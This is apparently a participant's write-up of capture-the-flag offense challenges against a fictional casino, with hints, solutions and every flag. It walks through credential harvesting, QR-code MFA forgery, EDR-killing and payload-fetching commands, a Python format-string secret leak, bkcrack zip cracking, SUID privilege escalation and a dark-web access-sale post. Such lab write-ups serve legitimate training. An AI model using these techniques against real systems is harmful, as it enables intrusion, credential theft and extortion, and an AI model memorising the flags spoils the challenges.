There were 10 Offense challenges with one having two sub-challenges, for a total of 11 flags to find with 1800 points possible.
Last updated
This section was kind of painful. I couldn't quite make it without some hints and some nudges from the cohort. Still, I was able to finish, which I'm pretty happy about!
O1 - Find your Targets
Prerequisites: Complete the tutorial.
Phishing is the leading infection vector, so as a red-teamer, how would you go about phishing the casino? Find what you need to phish someone at the casino and there should be a flag nearby!
Given:
Link Casino homepage
O1 - Find your Targets [hint]
Pivot, pivot, pivot.
O1 - Find your Targets [solution]
Go to the casino website. Click on “The Team”. Review the info. There are some social media handles here.
Go to X.com and look up the handles (yes, if you don't have an account, you have to create one). Dig around to find the only team member that didn’t have socials.
They have a github link on their profile. Use that link.
Their Github has an email address on it and near the email address is the flag:
ctf{maybeD0ntLISTtheC0rpEm@il}
WARNING: if you view this on a cell phone the flag will not or may not show. You must view it on a desktop or put your phone in landscape mode.
O2 - Build a Credential Harvester
Prerequisites: Complete the tutorial.
After you have something to phish, how do you leverage that to get access into an organization? Credential harvesters are great for this and the best ones look like the real thing. Fortunately there are tools, like HTTrack, that help us quickly and easily clone websites. The flag is received once you successfully clone the casino homepage and enter the credentials "admin" and "password" there.
O2 - Build a Credential Harvester [solution]
First you need to install HTTrack. In Kali, I had to do the following (it's been a while since I had to do anything in Linux, so it took me a while to figure this out again):
sudo apt-get update
sudo apt-get install httrack
For the final command, substitute the URL for <url>. Also, remember that wherever you are is where the folder will be found for your files (i.e. if you are in the Downloads folder, there will be a new folder created for the website in the Downloads folder).
httrack <url>
Once it’s done, open the folder, find the “employee-login.html” page and open it. Then just enter “admin” and “password” into the boxes and click login. You should get the flag underneath the button.
h4rv3st3r_h3r0
Just remember you can't navigate to the actual page. You have to use the page you copied with HTTrack.
O3 - Constructing your Phish
Prerequisites: Complete the tutorial.
Awesome. Now you have a credential harvester and an email to send it to. Now you just need to craft a convincing phish to get your target to click on it! How do you do that? By leveraging real emails sent to your target to craft a fake one! We've gotten ahold of an MFA onboarding email from the company, can you create a fake QR code to send to your target? Once you have submitted the correct QR code, you'll get the flag!
Given:
MFA onboarding email
a URL to validate the QR code
O3 - Constructing your Phish [hint]
This was another one that took way longer than I think should have.
For this, just use the email. Get as much information as you can from the email. It actually cleverly has quite a bit of information in it!
I'm not sure how much more to tell on this one. But after you find all the information, it's just a matter of fiddling with the "recipe" on CyberChef.
Maybe one more hint that might have helped me get this one faster. If you don't want another hint, don't read any farther!!!
If you put the QR code image into Cyberchef, then to decode it, you need 3 blocks.
O3 - Constructing your Phish [solution]
Using either Google or CyberChef to look at the QRCode, it gives you
We know it’s likely Base64 from the "=" at the end and the mfa message from their security company mentions “mfa_secret” field as well as XOR (Xpert Online Resilience).
So, you can either paste the above text into CyberChef or import the QR Code and use “Parse QR Code” as your first block. Then after that, add “From Base64” block and the “XOR” block. Leave everything as defaults. You’ll be seeing a bunch of junk, but knowing that “mfa_secret” is part of it, put “mfa_secret” into the XOR block as the key and change the encoding next to it from “Hex” to “UTF8”.
This should show the first 8-10 correct characters in the Output window. This should start with “0719202207”. Replace the key with that, minus the repeating part (07) and you should get a complete plaintext string!
Now, just copy all of that, delete everything in CyberChef, and paste that into the Input window of CyberChef. Be sure to change the URL!
Now we have to do the reverse. At the top goes the XOR, then “To Base64”, and finally “Generate QR Code”. Make sure the same options and key go into the XOR block. Save the generated image and submit it to get the flag!
flag{WI$h_I’d_Squ!sh3d_Th@t_BuG}
For me, the part that tripped me up was needing to switch the XOR from Hex to UTF-8. Such a minor thing and, in retrospect, a very obvious thing. But I tried so many different combinations... :*)
O4 - Use your Captured Creds
Prerequisites: Complete O1, O2, and O3.
Your victim has clicked on the link and you've gotten their credentials! Now what? Why use those credentials to get into the casino! You've logged into the victim's email, who happens to be on the security team, so now you need to dig around their email. What useful information can you find? Looks like you could find the name of their Endpoint Detection and Response (EDR) tool! The name of the EDR is the flag.
O4 - Use your Captured Creds [solution]
This is mostly just looking through emails that look likely. There were actually two names: Sentry Guard EDR (which was in PoC status in the Junk folder) and an email from CyberGuardianPro in the Favorites folder. Based on the wording of both, the flag was:
CyberGuardianPro
O5 - Take Over an EDR Account
Prerequisites: Complete O4.
Now that you know the name of the EDR that the casino is using, can you leverage that to further your access into their network? Many companies are now using Multi-Factor Authentication (MFA) to provide additional defenses against unauthorized access. After reviewing your victim's email, it looks like the casino is using their own (insecure) MFA generating app, which you've gotten access to the source code. Can you figure out how to get the One Time Password (OTP) to reset the victim's password? You get 10000 attempts. :)
O5 - Take Over an EDR Account [hint]
This one was tough; which is probably why there were 10,000 attempts allowed.
There are realistically only two things that you need to know to solve this:
What the code is doing (you can read the source code or build the app)
What information you need to use to get the OTP to reset the victim's password
The only other thing I'll say is that there is a piece of information you need that a lot of people missed, including myself. It was super easy to miss, but when you realize what it is, it hits you like a ton of bricks.
In the real challenge, you had a lot more information than what I provided above, however I did provide everything you need to figure out what the OTP was without needing to sort through all the extraneous information. </hint>
O5 - Take Over an EDR Account [solution]
First, I downloaded Visual Studio; make sure it’s for your OS. In my case, I didn’t look far enough down to find the .deb file for Kali. Download that file and run the following command to install it.
sudo dpkg -I package_name.deb
However, in retrospect, you don’t need to do that.
Just open the files in a text editor. They’re short files. A bunch of files are “.class” extensions, so just find the ones that end in “.java”. For me, they were in “Downloads/alg_gen/src/main/java/cs/com/alg_gen”
And then were in separate folders after that, but not many files, so it was easy. Just read the code. I wasn’t familiar with Java so it took a while, but I figured it out.
What was hard was that the code told me that the OTP was based on the time. But when I tried, it wasn't the flag. I looked everywhere, but the rest of the code just looked like extra stuff to throw you off and had no effect on the actual result.
I kept thinking I was misunderstanding the code since it does ask for an email and I didn't have the right answer yet. But since it didn’t use the email after that, or at least I couldn't find that part, I didn’t think that was it.
I finally figured it out. It’s not the email address that is being used. It’s the TIME that the original email was sent that is used.
Therefore, the date/time the email was sent was May 24, 2024 12:23 PM which makes the flag:
241223
This was another one that I spent way too long looking at.
O6 - Find a Way In
Prerequisites: Complete O3.
Now that you have credentials and the OTP, where can you use them? Scan the casino's server to determine what services are running on it and if any are vulnerable.
Given:
URL and port
O6 - Find a Way In [solution]
I had to remember how to use nmap for this. lol. This is the command I ran:
sudo nmap 0.cloud.chals.io -p 12557 -sV
Which gave me back a bunch of junk, but within that junk was a discernable flag:
ctf{t@rgetL0ck3d}
O7 - Bypass the EDR
Prerequisites: Complete O5.
Great! You've gotten access to a host in the casino's network, great job! Now, you'll want to establish persistence - aka a way of keeping yourself in the network. One way of doing so is to install some remote control software, such as AnyDesk, but the EDR is doing it's job and keeping you from installing it. How can you bypass the EDR and install the remote control software? You've got some friends in low places who you've paid to get access to a EDR bypass program. However, you need to get that program on the host as well... Once you are able to download AnyDesk to the casino's server, you'll get the flag!
Given:
Simulated URL for AnyDesk
Simulated URL for EDR Killer
A link to a simulated bash shell
O7 - Bypass the EDR [hint]
Your hint for this one is just that you want to play and do anything and everything you're allowed to. Don't forget any commands that could be used. True, there are limited commands that you are allowed to use on the simulated shell. BUT there are some commands that I definitely don't leverage that often that really cost me in the end...
Also, this one was one of the most difficult for me. You can tell because I actually bought a hint for it!
O7 - Bypass the EDR [solution]
For this one, the link redirects to a bash-like interface similar to O9.1 (I did them out of order since that one opened earlier for me). The command “curl <url>” gets a “blocked by Cyber Guardian” message. I typed “help” to see my options for this, as not all commands work on this simulated command screen.
Messing around, I found the following files: Bin/narsh, Usr/bin/cguard (“simulated script”), Usr/bin/cguardd ("permission denied"), and Var/lib/cguard.sentinel (“guarding”).
No matter what curl commands or echo commands or redirect commands I ran, all of them failed. So that wasn't the answer...
I ended up taking the first hint. Which wasn’t 100% helpful since most of it I knew, BUT I forgot that you can run “--help" on anything. I ran that option on cguard and found the following options: "script” and “disable”.
Ran the following command:
cguard --script <EDR Killer url>
Got the following back “downloaded script to /tmp/facestab”
That file had default permissions “645” = (u=rw, g=r, o=rx). Now I need to run it. I tried running "cguard --script /tmp/facestab" and got “try again”. Got a nudge from another participant that the command doesn't allow local files. So tried running the previous command with the extra parameters gotten from a pivot after the BleepingComputer article:
cguard --script <EDR Killer url> -p 10 -k
which killed the EDR!
Now that the EDR has been disabled, run the following command to upload AnyDesk to the device.
curl <AnyDesk url>
And you should get the flag!
wicys2024{anydeskanytime}
O8 - Performing an Exfil of a Filesystem
Prerequisites: Complete O6.
Reviewing the emails of your victim, you've noticed that there was a backup of a server uploaded to a secure fileshare. Sounds like $$$. How can you access it? You've gotten access to the password vault service running as a start, can you finish this and get the flag inside the backup zip?
Given:
Victim's emails (which shows the username and URL for the backup)
nc <url> <port>
ValuVault documentation (made only for this CTF, screenshot below)
O8 - Performing an Exfil of a Filesystem [hint]
For the first part, getting the password, this site might be a good resource:
To know where to find and what you need to exploit that vulnerability
(you'll need 3 things)
O8 - Performing an Exfil of a Filesystem [solution]
I think this one gave the MOST people problems, including me. I only took hints for two challenges and this was the second (O7 was the first).
For this one, just use their "nc" command above into the terminal and you’ll get a list similar to the list on the ValuVault documentation: LIST, GET, etc.
Googling around on "hacking python", shows that there is a string exploit we can try.
motd {now.__init__.__globals__}
Which spits out a ton of data including: “MASTER_PASSWORD”: ‘Li0n_a83*kFYz95!2’
Then:
get backup_admin
Li0n_a83*kFYz95!2
Gives you the password for backup_admin: 8szS)89Y$jDq0t}BS:Hj<37J
Then go back to the emails to get the link for the zip, navigate to it and enter the admin and the password to download. Congratulations! The first part of O8 is complete!
Now that we have the zip, what's in it? There are six empty folders and two encrypted text files in the zip (flag.txt and slots.txt). How can we decrypt the flag?
First, let's gather some information about the zip:
7z l -slt backup.zip
Shows us that the "Method" for flag.txt is ZipCrypto Store. Googling weakness or vulnerability of ZipCrypto shows that plaintext attacks will work against it. But it needs to have some known text. How do we get that? I tried guessing for a short bit, but then went back to the drawing board. Comparing the file sizes for flag.txt and slots.txt, slots.txt is significantly bigger, meaning more text. Potentially more known plaintext.
Wait. Have we seen slots before somewhere? Oh yeah. In the password vault. Let's try getting it using the same method as backup_admin. We get a new password. Where can we use that? Well, considering the file we just got was a backup of that same server, we can just change the URL from that email from "../backup.zip" to "../slots.txt". We get a password prompt, enter the information we just found in the vault and are able to download the file!
Cool. Now we have some known plaintext! Now what? From our searching before, we know that there is a tool called bkcrack that works against these zips. Download away! Now, you can't install the file I found, you need to run it the "old-fashioned" way with "./" before the program name. Copy the first part of the slots file into a new txt file called "plain.txt". Per the instructions on that github, run the following command:
./bkcrack -C backup.zip -c slots.txt -p plain.txt
Wait for it to finish and you should get "Keys". Copy the keys and run the following command, substituting the Keys found above with <Keys>:
./bkcrack -C backup.zip -k <Keys> -D decrypt.zip
Now, all that's left is to open the decrypted zip and open the flag file for the win!
flag{xamine_your_zip_pretty_darn_quick}
O9.1 - Escalate your Privileges
Prerequisites: Complete O6.
Now you have access to a host on the casino's network, but you only have limited privileges on that device. You can only run certain applications and all the really helpful applications need administrator privileges. How can you elevate your privileges to get this party started? An easy way is to use a file that has the permissions you need and have it execute your command for you!
Using the NARSH (Not A Real Shell) emulator, find a file with world writable permissions that executes as root.
O9.1 - Escalate your Privileges [solution]
This one, I didn’t understand their wording very well, but what they are looking for are permissions that look like this: -rw-rw-rw-, which ended up being one file called
yydUpQ.sh
Strangely enough I did a search and there’s a second file with the same permissions. And even stranger, I did this later and didn't find this filename at all. Too bad I can't test if other filenames are flags...
O9.2 - Escalate your Privileges
Prerequisites: Complete O9.1.
You've got a file that will allow you to run commands with escalated privileges. You've already ran the following command, the flag is the next command you need to run in order to successfully elevate your privileges.
cp /bin/bash /tmp && chmod +s /tmp/bash
O9.2 - Escalate your Privileges [solution]
Googling the above commands, I got a github page for privilege-escalation on Linux. Gave me the command:
/tmp/bash -p
O10 - Sell your Access
Prerequisites: Complete O8.
Last Offense challenge! You're doing great, just one more step! You've gotten access and established persistence to the casino's network. Now you need to create a post on the dark web that will advertise your wares. Once you have created an effective advertisement, the flag will appear.
O10 - Sell your Access [solution]
The main.html page looks like you can click stuff, but the only thing you can click is the “New Post” button. There you can select the Topic, and enter your subject and message. Every time you enter something it’ll give you a message on what else you need to get the flag. I started with just saying “something” to see and it wanted the correct topic, the company name in the subject, bitcoin address, and tox id (the last two had to have the correct formatting). Then you get the flag and you’re done!
